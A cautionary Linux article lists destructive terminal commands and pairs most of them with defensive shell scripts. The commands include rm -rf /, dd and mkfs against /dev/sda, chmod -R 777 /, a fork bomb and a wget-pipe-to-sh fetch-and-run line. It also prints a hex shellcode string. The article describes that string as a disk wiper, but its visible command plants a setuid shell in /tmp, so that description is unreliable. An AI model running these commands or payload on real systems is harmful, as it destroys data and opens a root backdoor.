Deadly mistakes that you would want to avoid on your Linux box

Linux is a powerful operating system, and its command-line terminal is even more powerful: it can be used to control everything in the OS. There are lots of things you should keep in mind while using the terminal so that you don't end up messing up your Linux box.

I have collated some commands and activities that should be handled with care before execution, or not executed at all. Some of these require root to be executed; others, in the case of Ubuntu, can be executed using sudo access.

Please make sure you don't run any of these commands or perform any of these activities on your server. If you want to try them, do so on a virtual machine.

Here you go!

rm -rf Command

The rm -rf command is one of the easiest ways to delete any file or folder in Linux. Almost everyone knows it and uses it whenever required.
But not everyone knows the proper usage of this command, and users are often unaware of the consequences its misuse can lead to. The damage caused by improper usage of this command is unrecoverable.

Let me give you an overview of the usage of the rm -rf command.

The syntax of the command is:

rm [OPTION] FILE


rm -r    : deletes a directory recursively, together with everything inside it.
rm -f    : removes read-only files without asking for confirmation.
rm -rf / : forces deletion of everything under the root directory.
rm -rf * : forces deletion of everything in the present working directory.
rm -rf . : forces deletion of the current folder and its subfolders.

There are ways to guard against the dangers of the rm command. Check out one of my previous articles on the subject.
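As an added example (not code from the original post), here is a guard function that refuses to hand catastrophic targets to rm. It assumes GNU coreutils (readlink -f). Note that current GNU rm already refuses rm -rf / unless --no-preserve-root is given, and refuses to remove . and ..; the guard extends that idea to a list of other directories you would never want removed (the PROTECTED_DIRS list is an assumption to adjust for your own systems), and it also catches the rm -rf * case, where the glob expands inside a directory you did not expect to be in, because every expanded argument is checked individually.

```shell
# Added example, not from the original post. Assumes GNU coreutils.

# Directories that must never be a recursive rm target (assumed list).
PROTECTED_DIRS="/ /bin /boot /dev /etc /home /lib /lib64 /opt /proc /root /sbin /srv /sys /usr /var"

# guard_rm_target PATH -> 0 if PATH is safe to pass to rm -rf, 1 otherwise.
guard_rm_target() {
    target=$1
    # Canonicalise so that "../..", symlinks and trailing slashes cannot hide
    # the real destination.
    resolved=$(readlink -f -- "$target" 2>/dev/null) || return 1
    for dir in $PROTECTED_DIRS; do
        if [ "$resolved" = "$dir" ]; then
            echo "refusing to remove protected directory: $resolved ($target)" >&2
            return 1
        fi
    done
    # The home directory itself is also off limits.
    if [ -n "$HOME" ] && [ "$resolved" = "$(readlink -f -- "$HOME")" ]; then
        echo "refusing to remove home directory: $resolved" >&2
        return 1
    fi
    return 0
}

# safe_rm_rf PATH... -> runs rm -rf only if every argument passes the guard;
# with "safe_rm_rf *" each glob expansion is checked on its own.
safe_rm_rf() {
    for t in "$@"; do
        guard_rm_target "$t" || return 1
    done
    rm -rf -- "$@"
}
```

Define the functions in your shell profile and use safe_rm_rf in place of rm -rf for interactive work; the guard rejects the whole call if any single argument resolves to a protected path, so nothing is deleted when one argument is wrong.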


Disguised version of the rm -rf command


There is one more thing you should be aware of when it comes to the rm -rf command. A hex-encoded version of it is easily available on the internet and, when run, wipes out the root partition.

The code looks like:

char esp[] __attribute__ ((section(".text"))) /* e.s.p
release */
= "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"
"\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"
"\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"
"\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"
"\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"
"\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"
"\x6e\x2f\x73\x68\x00\x2d\x63\x00"
"cp -p /bin/sh /tmp/.beyond; chmod 4755 /tmp/.beyond;";

Don't use it on your production server under any circumstances.


Use of fork bombs

In computing, a fork bomb (also called rabbit virus or wabbit) is a denial-of-service attack in which a process continually replicates itself to deplete available system resources.

Fork bombs operate both by consuming CPU time in the process of forking, and by saturating the operating system's process table. A basic implementation of a fork bomb is an infinite loop that repeatedly launches the same process.

There are several versions of fork bombs available on the internet, the following being the most common.

:(){:|:&};:

It keeps spawning itself again and again until the system freezes.

Check out this article to learn more about fork bombs and the other versions that are around.
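The standard defence against a fork bomb is a per-user process cap (RLIMIT_NPROC), set for the current shell with ulimit -u N or persistently in /etc/security/limits.conf through pam_limits. The following added example (mine, not from the original post) reads a limits.conf-style file and reports the hard nproc limit that applies to a given user, so you can audit whether that protection is actually in place before a fork bomb tests it for you. The sample limits file is constructed for the demonstration; the real file is /etc/security/limits.conf.

```shell
# Added example, not from the original post. Audits a limits.conf-style file
# for a hard nproc cap, which is what stops a fork bomb from taking the box.

# hard_nproc_limit USER FILE -> prints the hard nproc value applying to USER
# (an exact user entry beats a "*" wildcard entry); returns 1 if none is set.
hard_nproc_limit() {
    user=$1
    file=$2
    exact=""
    wildcard=""
    # Each entry is: <domain> <type> <item> <value>; "#" starts a comment.
    while read -r domain type item value rest; do
        case $domain in ''|'#'*) continue ;; esac
        [ "$type" = hard ] && [ "$item" = nproc ] || continue
        if [ "$domain" = "$user" ]; then
            exact=$value
        elif [ "$domain" = '*' ]; then
            wildcard=$value
        fi
    done < "$file"
    if [ -n "$exact" ]; then
        echo "$exact"
    elif [ -n "$wildcard" ]; then
        echo "$wildcard"
    else
        return 1
    fi
}

# fork_bomb_protected USER FILE -> 0 only when a numeric hard cap applies;
# "unlimited" (or no entry at all) is not protection.
fork_bomb_protected() {
    limit=$(hard_nproc_limit "$1" "$2") || return 1
    case $limit in
        ''|*[!0-9]*) return 1 ;;
    esac
    return 0
}

# write_sample_limits FILE -> constructed sample of /etc/security/limits.conf
write_sample_limits() {
    cat > "$1" <<'EOF'
# constructed sample limits.conf
#<domain>      <type>  <item>         <value>
*              soft    nproc          4096
*              hard    nproc          8192
alice          hard    nproc          unlimited
bob            hard    nproc          1024
EOF
}
```

Run it as fork_bomb_protected "$USER" /etc/security/limits.conf on a real system; a non-zero exit means nothing in that file caps the number of processes for your account. In the sample, bob and any unlisted user are capped, while alice's "unlimited" entry overrides the wildcard and leaves her unprotected.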


Improper use of chattr command

The chattr command changes file attributes on a Linux file system. Used in the wrong way, it can render your user account unusable.

Let me give you an overview of the chattr command.

The syntax of the chattr command is:

chattr  [operator] [switch]  [file name]

Running the following command sets the i (immutable) attribute recursively on the user's home directory.

chattr +i -R  /home/user


A file or directory with the +i attribute cannot be modified: it cannot be deleted or renamed, no link can be created to it and no data can be written to it. Only the superuser can set or clear this attribute.
To remove the i attribute, use it with the - operator, i.e. '-i'.

'-R' recursively changes attributes of directories and their contents.

The operator ‘+’ causes the selected attributes to be added to the existing attributes of the files; ‘-’ causes them to be removed; and ‘=’ causes them to be the only attributes that the files have.

When a user logs in to their account, several files get modified, and this command prevents those required modifications, which can result in various kinds of issues for the user.
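Before a user is locked out, stray immutable attributes under a home directory can be detected by parsing lsattr output: each line is an attribute field followed by the path, and the letter i in that field marks the immutable attribute. The following is an added example (not from the original post): the parser works on captured output, so the demonstration runs without e2fsprogs or a filesystem that supports chattr, and audit_immutable wraps it around a real lsattr -R run. The sample lsattr output is constructed.

```shell
# Added example, not from the original post: find files flagged immutable
# from lsattr output, and undo the mistake with the mirror-image command.

# immutable_paths < LSATTR_OUTPUT -> prints the paths flagged immutable
immutable_paths() {
    while read -r flags path; do
        # lsattr -R also prints "dir:" headers and blank lines; only lines of
        # the form "<flags> <path>" with a letters-and-dashes flag field count.
        [ -n "$path" ] || continue
        case $flags in *[!a-zA-Z-]*) continue ;; esac
        case $flags in
            *i*) printf '%s\n' "$path" ;;
        esac
    done
}

# count_immutable < LSATTR_OUTPUT -> number of immutable entries
count_immutable() {
    immutable_paths | wc -l | tr -d ' '
}

# audit_immutable DIR -> lists immutable files under DIR using the real lsattr
# (requires e2fsprogs and a filesystem with attribute support, e.g. ext4)
audit_immutable() {
    lsattr -R -- "$1" 2>/dev/null | immutable_paths
}

# The fix, once you have the list, is the mirror image of the mistake and
# also needs root:
#   chattr -i -R /home/user

# Constructed sample of "lsattr -R /home/user" output for the demo
SAMPLE_LSATTR='----i---------e------- /home/user/.bashrc
--------------e------- /home/user/.profile

/home/user/.ssh:
----i---------e------- /home/user/.ssh/authorized_keys
--------------e------- /home/user/.ssh/known_hosts'
```

On a real system, audit_immutable /home/user prints exactly the files that would block a login's writes to dotfiles; in the constructed sample, .bashrc and authorized_keys are reported and the rest are not.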


Setting improper default runlevel

A Linux distro has 7 runlevels by default; the purpose of each runlevel differs from distro to distro.

The runlevels used by Red Hat/CentOS are:

#   0 - halt
#   1 - Single user mode
#   2 - Multiuser, without NFS (the same as 3, if you do not have networking)
#   3 - Full multiuser mode
#   4 - unused
#   5 - X11
#   6 - reboot

The default runlevel for the system is set in the /etc/inittab file. If inittab has the entry id:5:initdefault:, X11 is the default runlevel. But if the default runlevel is set to 6 or 0, the system will reboot or halt as soon as it enters that runlevel.
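A check like the following, added here as an example and not taken from the original post, validates the default runlevel before the system is rebooted into it: on SysV-style systems it reads the id:N:initdefault: line from /etc/inittab and refuses 0 (halt) and 6 (reboot). The inittab used in the demonstration is constructed. On systemd distributions the equivalent setting is the default target reported by systemctl get-default; the second function applies the same rule to that output, rejecting poweroff.target, reboot.target and halt.target.

```shell
# Added example, not from the original post: refuse a default runlevel or
# default target that would halt or reboot the machine as soon as it boots.

# inittab_default_runlevel FILE -> prints N from "id:N:initdefault:";
# returns 1 if the file has no such entry.
inittab_default_runlevel() {
    level=$(grep -E '^[^#:]*:[0-9]:initdefault:' "$1" | head -n 1 | cut -d: -f2)
    [ -n "$level" ] || return 1
    echo "$level"
}

# check_initdefault FILE -> 0 if the default runlevel is safe, 1 otherwise
check_initdefault() {
    level=$(inittab_default_runlevel "$1") || { echo "no initdefault entry" >&2; return 1; }
    case $level in
        0) echo "initdefault is 0: the system would halt on boot" >&2; return 1 ;;
        6) echo "initdefault is 6: the system would reboot in a loop" >&2; return 1 ;;
    esac
    return 0
}

# check_default_target TARGET -> systemd equivalent; pass it the output of
# "systemctl get-default"
check_default_target() {
    case $1 in
        poweroff.target|reboot.target|halt.target) return 1 ;;
        *) return 0 ;;
    esac
}

# write_sample_inittab FILE LEVEL -> constructed /etc/inittab for the demo
write_sample_inittab() {
    cat > "$1" <<EOF
# constructed sample /etc/inittab
id:$2:initdefault:
si::sysinit:/etc/rc.d/rc.sysinit
EOF
}
```

Run check_initdefault /etc/inittab (or check_default_target "$(systemctl get-default)") from a pre-reboot checklist; commented-out initdefault lines are ignored because the pattern requires the entry to start the line.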


Improper use of dd command

dd if=/dev/random of=/dev/sda
dd if=/dev/null of=/dev/sda
dd if=/dev/zero of=/dev/sda

Any of the above commands will wipe the block device sda, or overwrite it with random junk data, leaving your system in an unrecoverable state.

Let me give you an overview of the dd command.

The dd command performs low-level copying from one location to another.

if=/dev/random - use /dev/random (random data) as the input

if=/dev/null or if=/dev/zero - use null or zeros as the input

of=/dev/sda - output to the first hard disk, sda, overwriting its file system with random garbage or zeros


Execution of untrusted package/application

This is something most of us do most of the time. When we have an issue on our system, the only thing we care about is getting it fixed by any means; we don't always check whether the source of the application or script we are using is trusted.

Let me explain with an example.
 
wget http://malicious_source -O- | sh


In the above command, wget downloads a file from some malicious source and its output is fed to the sh command through the pipe; sh then executes the downloaded content as a script.

The main thing to take care of here is the URL, i.e. the source. The same goes for rpm or Debian packages: make sure you download them from a trusted source.
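The safer pattern for a remote install script is download to a file, verify, inspect, then run, rather than piping the network straight into sh. The following is an added example (mine, not from the original post): verify_and_run checks a file's SHA-256 against a digest obtained out of band (from the project's release page, a signed manifest, or your own pinning) and only then executes it; fetch_verify_run wraps that around curl, with the URL and digest as placeholders you replace. It assumes GNU coreutils (sha256sum) and curl. The sample installer written by write_sample_script is constructed for the demonstration.

```shell
# Added example, not from the original post: never pipe a download into sh;
# save it, check its digest, then run it.

# sha256_of FILE -> hex digest (GNU coreutils sha256sum)
sha256_of() {
    sha256sum -- "$1" | cut -d' ' -f1
}

# verify_and_run FILE EXPECTED_SHA256 [ARGS...]
# -> runs FILE with sh only if its digest matches; returns 1 without running
verify_and_run() {
    file=$1
    expected=$2
    shift 2
    actual=$(sha256_of "$file")
    if [ "$actual" != "$expected" ]; then
        echo "digest mismatch for $file: expected $expected, got $actual" >&2
        return 1
    fi
    sh "$file" "$@"
}

# fetch_verify_run URL EXPECTED_SHA256 -> download to a private temp file,
# verify, run, clean up. URL and digest are placeholders to be replaced.
fetch_verify_run() {
    tmpfile=$(mktemp) || return 1
    # --fail turns an HTTP error into a failure instead of a saved error page
    curl --fail --silent --show-error --location -o "$tmpfile" "$1" || { rm -f "$tmpfile"; return 1; }
    verify_and_run "$tmpfile" "$2"
    status=$?
    rm -f "$tmpfile"
    return $status
}

# write_sample_script FILE -> constructed stand-in for a downloaded installer
write_sample_script() {
    printf '#!/bin/sh\necho "installer ran with: $*"\n' > "$1"
}
```

Usage on a real download would be fetch_verify_run https://example.invalid/install.sh <digest-from-release-page>; because the digest comes from a different channel than the script, a swapped or tampered file fails the check and is never executed. Saving to a file also gives you the chance to read the script before deciding to run it at all.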


Improper execution of chmod command

chmod stands for change mode; it modifies the mode bits and the extended access control lists (ACLs) of the specified files or directories. Of course, there are ways you may easily misuse the command.

Let me show you with an example.

chmod -R 777 /

The command above grants read, write and execute (777) permissions on every file under / to every user, making your system vulnerable and insecure.
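After a mistake like chmod -R 777, the practical question is which files are now world-writable. The functions below are an added example (not from the original post): they list world-writable entries under a directory, skipping symlinks (whose mode is meaningless) and sticky-bit directories such as /tmp (which are world-writable by design), and strip the group and other write bits to undo the damage without touching execute bits, so binaries stay executable. They take a root directory so they can be run against a test tree; the tree built by make_sample_tree is constructed. They assume GNU find.

```shell
# Added example, not from the original post: audit and repair world-writable
# permissions after an over-broad chmod.

# world_writable DIR -> prints world-writable files and directories under DIR,
# ignoring symlinks and sticky-bit directories
world_writable() {
    find "$1" ! -type l -perm -002 ! \( -type d -perm -1000 \) -print | sort
}

# strip_world_write DIR -> removes group and other write bits under DIR
# (execute bits are left alone, so executables keep working)
strip_world_write() {
    find "$1" ! -type l -exec chmod go-w {} +
}

# make_sample_tree DIR -> constructed tree with one open file, one sane file
# and a sticky-bit scratch directory
make_sample_tree() {
    mkdir -p "$1/etc" "$1/tmp"
    chmod 755 "$1/etc"
    printf 'secret\n' > "$1/etc/shadow"
    printf 'hello\n' > "$1/etc/motd"
    chmod 666 "$1/etc/shadow"
    chmod 644 "$1/etc/motd"
    chmod 1777 "$1/tmp"
}
```

world_writable / on a real system is the audit; strip_world_write is a blunt repair that removes the world-writable condition but does not restore the original modes, so for system directories a reinstall of the affected packages (or a permissions reset from the package manager) is the proper follow-up.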


Improper use of mkfs command

mkfs.ext4 /dev/sda

The above command, when executed, formats the /dev/sda block device, wiping all data from it and leaving your system in an unrecoverable state.
If you need to run mkfs to format a partition or device, please make sure you know the proper usage of the command first.


mkfs.ext4 – creates a new ext4 file system on the device that follows.

/dev/sda1 – specifies the first partition on the first hard drive, which is probably in use.
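Before any command that writes raw blocks to a device, whether dd of=, mkfs or wipefs, confirm that the device, or any partition on it, is not mounted. The following added example (not from the original post) serves both the dd section and this mkfs section: it reads a /proc/mounts-style file and refuses to run the destructive command while the target is in use. The real file is /proc/mounts; a constructed copy is used in the demonstration. One detail worth knowing for the dd case: dd if=/dev/null writes nothing, because /dev/null returns end-of-file at once; it is /dev/zero and /dev/random that actually overwrite the disk.

```shell
# Added example, not from the original post: guard dd/mkfs-style commands
# with a mounted-device check.

# device_in_use DEV MOUNTS_FILE -> 0 if DEV, or a partition of DEV, is mounted
device_in_use() {
    dev=$1
    mounts=$2
    while read -r source mountpoint rest; do
        # /dev/sda covers /dev/sda1..; /dev/nvme0n1 covers /dev/nvme0n1p1..
        case $source in
            "$dev"|"$dev"[0-9]*|"$dev"p[0-9]*)
                echo "$source is mounted on $mountpoint" >&2
                return 0 ;;
        esac
    done < "$mounts"
    return 1
}

# guarded_wipe DEV MOUNTS_FILE COMMAND... -> runs COMMAND only if DEV is idle,
# e.g. guarded_wipe /dev/sdb /proc/mounts mkfs.ext4 /dev/sdb
guarded_wipe() {
    dev=$1
    mounts=$2
    shift 2
    if device_in_use "$dev" "$mounts"; then
        echo "refusing to run '$*': $dev is in use" >&2
        return 1
    fi
    "$@"
}

# write_sample_mounts FILE -> constructed /proc/mounts snapshot for the demo
write_sample_mounts() {
    cat > "$1" <<'EOF'
/dev/sda1 / ext4 rw,relatime 0 0
/dev/sda2 /home ext4 rw,relatime 0 0
/dev/nvme0n1p1 /boot vfat rw 0 0
tmpfs /tmp tmpfs rw 0 0
EOF
}
```

With the real mounts table, guarded_wipe /dev/sda /proc/mounts dd if=/dev/zero of=/dev/sda would stop at the check on a system booted from sda, while a spare, unmounted disk passes. The check is deliberately conservative: a mounted partition anywhere on the disk blocks the whole disk.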

Improper use of the > operator

> file

The above command, when executed, empties the file. Very simple yet very dangerous: dangerous when you end up emptying a configuration file on your server. So take care when using the > operator.
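The shell's noclobber option (set -C, or set -o noclobber) turns > existing_file into an error, so a slip no longer empties a config file, while >| stays available for the times you really mean to overwrite. The following added example (not from the original post) shows the option at work: write_protected performs a write under noclobber inside a subshell so the caller's shell options are untouched, write_overwrite is the explicit override, and safe_truncate is the deliberate form of > file that keeps a backup. The files used are constructed in a temporary directory.

```shell
# Added example, not from the original post: noclobber as the guard against
# an accidental "> file".

# write_protected FILE CONTENT -> writes CONTENT to FILE only if FILE does
# not already exist; returns non-zero (and leaves FILE intact) otherwise
write_protected() {
    ( set -C; printf '%s\n' "$2" > "$1" ) 2>/dev/null
}

# write_overwrite FILE CONTENT -> explicit overwrite, even under noclobber
write_overwrite() {
    ( set -C; printf '%s\n' "$2" >| "$1" )
}

# safe_truncate FILE -> the deliberate version of "> file": back it up first
safe_truncate() {
    [ -f "$1" ] || return 1
    cp -p -- "$1" "$1.bak" && : >| "$1"
}
```

Putting set -o noclobber in your login shell's rc file makes the protection the default for interactive sessions; scripts run by cron or a service manager are not affected, since they start their own shell with default options.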


Well, that's all folks! There are obviously many more deadly commands that may leave a system unusable. Leave us comments and let other users know about them.
